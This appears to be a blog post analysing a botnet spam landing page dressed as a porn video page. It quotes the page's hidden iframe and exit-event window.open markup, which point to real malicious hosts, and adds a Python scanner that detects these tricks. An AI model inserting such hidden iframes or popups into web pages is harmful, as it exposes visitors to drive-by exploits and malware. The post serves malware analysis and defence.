PornTube botnet spam landing page

This is the oldest botnet spam landing page I have found so far, because I haven't pushed the datamining back to June yet. I see this one on July 6 and 7. Note to the people finding this page by Google: don't trust anything called "Porntube". You are exceedingly likely to be donating the use of your PC and DSL line to some really nice mafia guys if you click on anything called "Porntube".

Anyway, this page already shows most of the exploit elements still used in August, but attempts to look like a porn video page with comments. Of course, the video doesn't exist -- it's an executable called "video.exe" that's the payload of this scam.

The full page is here. Besides all the social-engineering techniques I've already documented elsewhere, this page tries to open a new window using JavaScript event handlers on the body tag:

<body onbeforeunload="window.open('http://61.162.230.12/index.php');" onunload="window.open('http://61.162.230.12/index.php');" onclose="window.open('http://61.162.230.12/index.php');" id="mainbody">

Unfortunately, as I attempt to document this on August 16, that page doesn't return. (It might, eventually; I'm impatient.)

The same URL is the target of an invisible iframe.

And there's another invisible iframe here:

<iframe src="http://digitaltreath.info/cgi-bin/index.cgi?user90" style="display:none" width="0" height="0" frameborder="0"></iframe>

Digitaltreath.info has also been unplugged sometime in the last month. A pity. But no fear -- there are still many newer exploits to track down! And I have no doubt that the coming week will bring us more.
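
For anyone datamining their own spam for pages like this, here is an added example (not code from the original page) that flags the two tricks documented above: invisible iframes and window.open calls hung on the body tag's exit events. The sample markup is constructed with placeholder hosts, and the names scan and LandingPageScanner are made up for this sketch.

```python
from html.parser import HTMLParser
import re

# Event attributes the page abuses on <body> to spawn a window on exit.
EXIT_EVENTS = {"onbeforeunload", "onunload", "onclose"}
WINDOW_OPEN = re.compile(r"window\.open\s*\(\s*['\"]([^'\"]+)['\"]")


def is_hidden(attrs):
    """True if an iframe is styled or sized so the visitor cannot see it."""
    style = (attrs.get("style") or "").lower().replace(" ", "")
    if "display:none" in style or "visibility:hidden" in style:
        return True
    # A width or height of 0 (with or without "px") also hides the frame.
    return any(re.fullmatch(r"0+(px)?", (attrs.get(k) or "").strip().lower())
               for k in ("width", "height"))


class LandingPageScanner(HTMLParser):
    """Collects (kind, where, url) findings for the two tricks described above."""
    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)
        if tag == "iframe" and is_hidden(attrs):
            self.findings.append(("hidden-iframe", tag, attrs.get("src") or ""))
        for name in EXIT_EVENTS & attrs.keys():
            for url in WINDOW_OPEN.findall(attrs[name] or ""):
                self.findings.append(("exit-popup", f"{tag}@{name}", url))


def scan(html):
    scanner = LandingPageScanner()
    scanner.feed(html)
    return sorted(scanner.findings)


# Constructed sample modelled on the markup above; hosts are placeholders.
SAMPLE = """
<body onbeforeunload="window.open('http://landing.example/index.php');"
      onunload="window.open('http://landing.example/index.php');" id="mainbody">
<iframe src="http://frame.example/cgi-bin/index.cgi?user90" style="display:none"
        width="0" height="0" frameborder="0"></iframe>
<iframe src="http://video.example/player" width="480" height="360"></iframe>
"""

if __name__ == "__main__": print(*scan(SAMPLE), sep="\n")
```

The visible 480x360 iframe in the sample is deliberately left unflagged, so the check keys on concealment rather than on iframes in general.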

Copyright © 1996-2009 Vivtek. All Rights Reserved.